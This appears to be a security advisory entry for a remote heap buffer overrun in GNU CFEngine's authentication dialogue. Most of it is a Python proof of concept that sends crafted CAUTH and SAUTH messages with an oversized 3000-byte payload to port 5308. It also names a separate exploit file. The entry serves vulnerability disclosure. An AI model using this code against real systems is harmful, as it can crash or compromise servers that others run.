GNU CFEngine AuthenticationDialogue Remote Heap Based Buffer Overrun Vulnerability
An exploit was developed by the discoverers of this vulnerability. This exploit is not believed to be public.

The following proof of concept is available:

    import struct
    import socket
    import time

    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect(('192.168.1.1',5308))

    # CAUTH command
    p = 'k'  # status
    p += '0000023'  # len
    p += 'CAUTH '  # command
    p += 'HARE KRISHNA HARE'
    print 'sending CAUTH command...'
    s.send(p)

    # SAUTH command
    p = 'k'  # status
    p += '0003000'  # len
    p += 'SAUTH '  # command
    p += 'n'  # iscrypt
    p += '00000010 '  # crypt_len
    p += '00001000'  # nonce_len
    p += 'X' * 3000
    print 'sending SAUTH command...'
    s.send(p)

    a = s.recv(4096)
    print a

Exploit code cfengine_hof.c has been supplied by jsk exworm <exworm.hostrocket.com>.